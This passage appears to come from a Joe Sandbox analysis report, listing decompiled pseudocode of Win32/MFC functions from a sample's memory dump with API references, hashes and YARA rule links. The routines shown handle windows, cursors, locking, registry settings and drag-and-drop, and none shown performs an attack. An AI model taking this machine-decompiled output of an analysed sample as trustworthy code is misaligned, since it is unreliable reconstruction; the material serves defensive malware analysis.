				void* _t10;
				void* _t22;
				intOrPtr* _t29;
				void* _t31;
				void* _t34;

				_t31 = __esi;
				_push(__ecx);
				_t22 = __ecx;
				if(E004131DD(0x10) == 0) {
					_t29 = 0;
				} else {
					_t29 = E004176E1(_t8, 0xffffffff);
				}
				_push(_t31);
				_t10 = GetCurrentProcess();
				if(DuplicateHandle(GetCurrentProcess(),  *(_t22 + 4), _t10,  &_v8, 0, 0, 2) == 0) {
					if(_t29 != 0) {
						 *((intOrPtr*)( *_t29 + 4))(1);
					}
					E00417D15(_t34, GetLastError(), 0);
				}
				 *((intOrPtr*)(_t29 + 4)) = _v8;
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t22 + 8));
				return _t29;
			}

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 0041777C
GetCurrentProcess.KERNEL32(?,00000000), ref: 00417782
DuplicateHandle.KERNEL32(00000000), ref: 00417785
GetLastError.KERNEL32(00000000), ref: 0041779F

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast
String ID:
API String ID: 3907606552-0
Opcode ID: 487aebb410ded9b0ec04d8d8fea2586699d6c29f13a4c79ccff8f06708e505eb
Instruction ID: 78f57001bf266bd8873ef29effcb20f5a2db12ccf0cf7036e4147b7dfe15a156
Opcode Fuzzy Hash: 487aebb410ded9b0ec04d8d8fea2586699d6c29f13a4c79ccff8f06708e505eb
Instruction Fuzzy Hash: CC018435704304BBEB10ABA9DC49FAA7BB8DF44760F244526F915CB2D1DB64EC8087A4

Uniqueness

Uniqueness Score: -1.00%

Function 00410C4F, Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00410C4F(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t21 = GetParent(_t24);
					if(_t21 == 0 || E0041A759(_t21, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t22 = E0041A7CE(_t24, _v12.x, _v12.y);
						if(_t22 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t22);
							_t9 = _t22;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t21;
					}
				}
				return _t9;
			}

APIs

WindowFromPoint.USER32(?,?), ref: 00410C67
GetParent.USER32(00000000), ref: 00410C74
ScreenToClient.USER32 ref: 00410C95
IsWindowEnabled.USER32(00000000), ref: 00410CAE

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$ClientEnabledFromLongParentPointScreen
String ID:
API String ID: 2204725058-0
Opcode ID: 1e2d37df1472de887ddde9cf9ac6649944d58a441de37f59d3653998fea7e7e4
Instruction ID: b03e2d05c99e3754afe2f9c82b4a20bfc763fe38c38db5da76ce186bf725b679
Opcode Fuzzy Hash: 1e2d37df1472de887ddde9cf9ac6649944d58a441de37f59d3653998fea7e7e4
Instruction Fuzzy Hash: 8D01D436600614BF87169B989C44DEF7BB9EF85740B140129F905D7310EB78DD818BEC

Uniqueness

Uniqueness Score: -1.00%

Function 00426CBA, Relevance: 6.0, APIs: 4, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00426CBA(intOrPtr __ecx, void* __eflags) {
				void* _t21;
				intOrPtr* _t32;
				struct HICON__** _t40;
				intOrPtr _t43;
				void* _t45;

				E00406520(E0042A113, _t45);
				_push(__ecx);
				_t43 = __ecx;
				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42c9fc;
				 *(_t45 - 4) = 1;
				E00419BEE(__ecx + 0x78);
				_t39 =  *((intOrPtr*)(_t43 + 0x114));
				if( *((intOrPtr*)(_t43 + 0x114)) != 0) {
					E004288AC(_t39);
					E00413206(_t39);
				}
				E00413206( *((intOrPtr*)(_t43 + 0x88)));
				_t32 =  *((intOrPtr*)(_t43 + 0x74));
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 4))(1);
				}
				_t40 = _t43 + 0x100;
				if( *(_t43 + 0x100) != 0) {
					SetCursor(LoadCursorA(0, 0x7f00));
					DestroyCursor( *_t40);
				}
				 *(_t45 - 4) =  *(_t45 - 4) & 0x00000000;
				E00419C1F(_t43 + 0x78);
				 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
				_t21 = E0041AD27(_t43);
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return _t21;
			}

APIs

__EH_prolog.LIBCMT ref: 00426CBF
LoadCursorA.USER32 ref: 00426D29
SetCursor.USER32(00000000), ref: 00426D30
DestroyCursor.USER32(00000000), ref: 00426D38

Part of subcall function 004288AC: __EH_prolog.LIBCMT ref: 004288B1
Part of subcall function 004288AC: DeleteDC.GDI32(?), ref: 004288D2

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Cursor$H_prolog$DeleteDestroyLoad
String ID:
API String ID: 2398634004-0
Opcode ID: 11ff31ac3701bcf7089a1abddc17fb2184ff4a9a02ad15d7e71b413ad67de2bd
Instruction ID: 779aaf76a531418baa36e2a5a867f58700d8f9a93bf22c0d14db93a2c62a59f0
Opcode Fuzzy Hash: 11ff31ac3701bcf7089a1abddc17fb2184ff4a9a02ad15d7e71b413ad67de2bd
Instruction Fuzzy Hash: A511E031300600DBE735AF65E806BEEBBA5EF44714F50012FE16697291CBB82981CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00414E0D, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00414E0D(struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __ebp;
				struct HWND__* _t10;
				void* _t12;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t16 = GetDlgItem(_a4, _a8);
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						if(_t17 == 0) {
							break;
						}
						_t12 = E00414E0D(_t17, _a8, _a12);
						if(_t12 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L11;
					}
					return 0;
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E00413740(_t18);
						}
						_t12 = E00413767();
						if(_t12 == 0) {
							goto L6;
						}
					} else {
						_t12 = E00414E0D(_t16, _a8, _a12);
						if(_t12 == 0) {
							goto L3;
						}
					}
				}
				L11:
				return _t12;
			}

APIs

GetDlgItem.USER32 ref: 00414E18
GetTopWindow.USER32(00000000), ref: 00414E2B
GetTopWindow.USER32(?), ref: 00414E5B
GetWindow.USER32(00000000,00000002), ref: 00414E76

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
Instruction ID: 713c4843e211392e89bb80c14a0a22a2ce3b3a0133c9697a1d0cdd1df30717b3
Opcode Fuzzy Hash: 784f82e7734976b1dbf31960bbb8f16ae9e5790f6c6f8c00282bd4486821dd93
Instruction Fuzzy Hash: 3601DF3620031AA7CF222FA1DC04FDF3B19BF907A8B058022FD1095220D73AD99286ED

Uniqueness

Uniqueness Score: -1.00%

Function 00414E86, Relevance: 6.0, APIs: 4, Instructions: 49
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00414E86(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				void* _t22;
				struct HWND__* _t24;

				_t22 = __edx;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t24 = _t16;
					if(_t24 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t24, _a8, _a12, _a16);
					} else {
						_push(_t24);
						_t20 = E00413767();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E0041357F(_t22);
						}
					}
					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
						E00414E86(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t24, 2);
				}
				return _t16;
			}

APIs

GetTopWindow.USER32(?), ref: 00414E94
SendMessageA.USER32(00000000,?,?,?), ref: 00414ECA
GetTopWindow.USER32(00000000), ref: 00414ED7
GetWindow.USER32(00000000,00000002), ref: 00414EF5

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
Instruction ID: 3d1463f18b92dc59c4e8e68b3c1d5ad38cebe4dbe95d796ae8901b7c7719fd47
Opcode Fuzzy Hash: 964e5e527de8f2c614a29ec2c7bb328b2d9dd3a836f6323a01ca71765bcf14b3
Instruction Fuzzy Hash: 9901E93210021ABBCF226F959C04EDF3B2ABF85395F448016FA1055161C73AD9B2EFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412FC3, Relevance: 6.0, APIs: 4, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00412FC3(void* __ecx, void* __ebp, signed int _a4) {
				intOrPtr _t16;
				int _t17;
				void* _t20;
				struct HWND__* _t26;
				intOrPtr _t35;
				void* _t36;

				_t37 = __ebp;
				_t36 = __ecx;
				_t16 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t16 == 0) {
					if(_a4 == 0) {
						_t35 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t35 + 0x1c)) {
							_t20 = E00413740(__ebp, GetParent( *(_t35 + 0x1c)));
							_t26 =  *(_t36 + 0x14);
							if(_t26 != 0) {
								_t26 =  *(_t26 + 0x1c);
							}
							E004166F5(E00413740(_t37, GetNextDlgTabItem( *(_t20 + 0x1c), _t26, 0)));
						}
					}
					_t17 = E004166CE( *(_t36 + 0x14), _a4);
					L9:
					 *((intOrPtr*)(_t36 + 0x18)) = 1;
					return _t17;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 0) {
					return _t16;
				}
				asm("sbb ecx, ecx");
				_t17 = EnableMenuItem( *(_t16 + 4),  *(__ecx + 8), ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000004);
				goto L9;
			}

APIs

EnableMenuItem.USER32 ref: 00412FEB
GetFocus.USER32 ref: 00412FFE
GetParent.USER32(?), ref: 0041300C
GetNextDlgTabItem.USER32(?,?,00000000), ref: 00413028

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
Instruction ID: 99040edbaee9cc6ce9264ed7bff9ba50270304a60b21238e3b9e9fd35de4f38b
Opcode Fuzzy Hash: bc0bc66af6aaaa198d2881ea29a35bfd1a92abf6c47daeb75bca8853a5adc8cd
Instruction Fuzzy Hash: 30117071200600ABCB389F21D859B9BBBB5EF44715F104A2EF142861A1CB79F9C68B58

Uniqueness

Uniqueness Score: -1.00%

Function 00428D0F, Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00428D0F(intOrPtr* __ecx, int _a4) {
				struct HDC__* _t8;
				int _t16;
				void* _t18;
				void* _t21;
				intOrPtr* _t22;

				_t16 = _a4;
				_t22 = __ecx;
				_t21 = GetStockObject(_t16);
				if(_t16 < 0xa || _t16 > 0xe && (_t16 <= 0xf || _t16 > 0x11)) {
					_t8 =  *(_t22 + 4);
					if(_t8 != 0) {
						SelectObject(_t8, _t21);
					}
					_push(SelectObject( *(_t22 + 8), _t21));
					return E0041A5FC();
				} else {
					_push(SelectObject( *(_t22 + 8), _t21));
					_t18 = E0041A5FC();
					if( *(_t22 + 0x2c) != _t21) {
						 *(_t22 + 0x2c) = _t21;
						E00428D7F(_t22);
					}
					return _t18;
				}
			}

APIs

GetStockObject.GDI32(?), ref: 00428D19
SelectObject.GDI32(?,00000000), ref: 00428D39
SelectObject.GDI32(?,00000000), ref: 00428D6B
SelectObject.GDI32(?,00000000), ref: 00428D71

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Object$Select$Stock
String ID:
API String ID: 3337941649-0
Opcode ID: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
Instruction ID: d553f3ff55a9007d7633e8bfee77d88ccc27de806737e89093267e5a4cde492b
Opcode Fuzzy Hash: 14040c587b624426947bbf76c6a43b9f4206a3670462a83c466de879dd4b5385
Instruction Fuzzy Hash: 5EF081717127206B9A305A66ECC9C2FB6BCDAA5384380482FF505C2261CE3CDC868A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004253EE, Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004253EE(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0x90) = _a4;
					 *(_t37 + 0x94) = _a8;
					 *(_t37 + 0x88) = _a12;
					_t21 = _a16;
					 *(_t37 + 0x8c) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}

0x004253f2
0x004253ff
0x0042544f
0x00425458
0x00425461
0x00425467
0x0042546a
0x00000000
0x0042546a
0x00425420
0x0042543a
0x00000000

APIs

IsWindow.USER32(0000E800), ref: 004253F7
SendMessageA.USER32(0000E800,00000420,00000000,?), ref: 00425420
SendMessageA.USER32(0000E800,0000041F,00000000,?), ref: 0042543A
InvalidateRect.USER32(0000E800,00000000,00000001,?,004253A6,?,?,?,?,ToolbarWindow32,00000000,?,?,00000800,0000E800,00000000), ref: 00425443

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
Instruction ID: f8499f2f8c5f873ffa7f07fa88986deb1236627fbfce6f7c18d287819d1ada54
Opcode Fuzzy Hash: f4d36221064b3d96524ce7ed6f56d09e9a1367ce0a48728fe94b366294ff310e
Instruction Fuzzy Hash: 00015270200714AFE7209F29DC01BAAB7F4FB04740F50842AF995D6291D7B0F851DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041E24C, Relevance: 6.0, APIs: 4, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E24C(void* __ecx, CHAR* _a4, CHAR* _a8, char _a12) {
				char _v20;
				void* _t17;
				long _t19;
				void* _t27;
				void* _t28;

				_t27 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					wsprintfA( &_v20, "%d", _a12);
					return WritePrivateProfileStringA(_a4, _a8,  &_v20,  *(_t27 + 0x90));
				}
				_t17 = E00425E7D(__ecx, _a4);
				_t28 = _t17;
				if(_t28 != 0) {
					_t19 = RegSetValueExA(_t28, _a8, 0, 4,  &_a12, 4);
					RegCloseKey(_t28);
					return 0 | _t19 == 0x00000000;
				}
				return _t17;
			}

0x0041e253
0x0041e259
0x0041e29d
0x00000000
0x0041e2b6
0x0041e25e
0x0041e263
0x0041e267
0x0041e278
0x0041e281
0x00000000
0x0041e28e
0x0041e2be

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0041E278
RegCloseKey.ADVAPI32(00000000,?,?), ref: 0041E281
wsprintfA.USER32 ref: 0041E29D
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0041E2B6

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
Instruction ID: 5e7b0193fad4bb3573ee89de37fde3184d05d4c4fb691ea0876ecaf7c45fa68e
Opcode Fuzzy Hash: c64c2f92659329a41f607b98f266effe197065bf02326c4a916ab297078829d9
Instruction Fuzzy Hash: 39018F32500629ABCB226F64DC09FEB3BACEF04714F44442AFE15A61A1E774D9118BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00424F9B, Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424F9B(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E0041F52D(__ecx, _t19, _a8);
				_t12 = E00416528(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0xa0))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}

0x00424fa2
0x00424fa6
0x00424fac
0x00424fb3
0x00424fbb
0x00424fc7
0x00424fcf
0x00424fe1
0x00424fef
0x00424ffd
0x00425002
0x00000000
0x00425002
0x00424fcf
0x00425008

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetParent.USER32(0000E800), ref: 00424FC0
IsZoomed.USER32(00000000), ref: 00424FC7
GetSystemMetrics.USER32 ref: 00424FEF
GetSystemMetrics.USER32 ref: 00424FFD

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MetricsSystem$LongParentWindowZoomed
String ID:
API String ID: 3909876373-0
Opcode ID: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
Instruction ID: 3022547c35077017ae25d59748aa6c1922cda0f4cb055a75ef651f6ebc74021f
Opcode Fuzzy Hash: e1db2512c1cdb55af8a63a090f6a65cb5054dc0af1d91fee160cccb0b30ffb68
Instruction Fuzzy Hash: 1E0167327006146BDB106FB4DC49B8EB768EF44744F414169FA01AB195D774AC45CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3C9, Relevance: 6.0, APIs: 4, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E0040E3C9(void* __ecx) {
				long _t1;
				long _t3;
				long _t8;
				void* _t9;

				_t1 =  *0x43a478; // 0x2
				_t9 = __ecx;
				_t8 = 2;
				if(_t1 != _t8) {
					__eflags = _t1;
					if(_t1 != 0) {
						while(1) {
							L7:
							__eflags =  *0x43a478 - 1;
							if( *0x43a478 != 1) {
								break;
							}
							Sleep(1);
						}
						__eflags =  *0x43a478 - _t8; // 0x2
						if(__eflags != 0) {
							L12:
							return _t9;
						}
						L10:
						_push(0x43a460);
						L11:
						EnterCriticalSection();
						goto L12;
					}
					_t3 = InterlockedExchange(0x43a478, 1);
					__eflags = _t3;
					if(__eflags != 0) {
						__eflags = _t3 - _t8;
						if(_t3 == _t8) {
							 *0x43a478 = _t8;
						}
						goto L7;
					}
					InitializeCriticalSection(0x43a460);
					E00405626(__eflags, E0040E447);
					 *0x43a478 = _t8;
					goto L10;
				}
				_push(0x43a460);
				goto L11;
			}

APIs

InterlockedExchange.KERNEL32(0043A478,00000001), ref: 0040E3F1
InitializeCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E3FC
EnterCriticalSection.KERNEL32(0043A460,?,00000000,?,0040C53D,?,?,?,?,0040101C,?,00401008), ref: 0040E43B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CriticalSection$EnterExchangeInitializeInterlocked
String ID:
API String ID: 3643093385-0
Opcode ID: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
Instruction ID: 459bb49f379d993a17294b602fe23a8fc8c079e5ea63f72b552277febdb2dab9
Opcode Fuzzy Hash: 15d63c4fe175e07819c280863269abae371696f7f342b3235db02761f23b8789
Instruction Fuzzy Hash: AAF0F4303C03509AEA204772AC8D6263754E7A4365F605837F6C1E22D0C7FA4CB2476E

Uniqueness

Uniqueness Score: -1.00%

Function 0042146D, Relevance: 6.0, APIs: 4, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042146D(void* __ecx, void* _a4) {
				int _v8;
				char _v268;
				void* __ebp;
				void* _t15;
				int _t19;
				intOrPtr* _t23;
				void* _t25;

				E00413740(_t25, SetActiveWindow( *(__ecx + 0x1c)));
				_t19 = 0;
				_v8 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t15 = E00424BFB();
				_t23 =  *((intOrPtr*)(_t15 + 4));
				if(_v8 > 0) {
					do {
						DragQueryFileA(_a4, _t19,  &_v268, 0x104);
						_t15 =  *((intOrPtr*)( *_t23 + 0x7c))( &_v268);
						_t19 = _t19 + 1;
					} while (_t19 < _v8);
				}
				DragFinish(_a4);
				return _t15;
			}

0x00421483
0x0042148e
0x00421499
0x0042149c
0x004214a4
0x004214a7
0x004214a9
0x004214b9
0x004214c6
0x004214c9
0x004214ca
0x004214a9
0x004214d2
0x004214dc

APIs

SetActiveWindow.USER32(?), ref: 0042147C
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 00421497
DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 004214B9
DragFinish.SHELL32(?), ref: 004214D2

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
Instruction ID: d3b2b95128177b05ecd3e0cb6b2ffa69d247fd4355a1387cba143c8becacc0b5
Opcode Fuzzy Hash: 752db8e80aa1e4f32f20f1a7616dd3027f181ba7cb5e1fdd8a659f832917dc3b
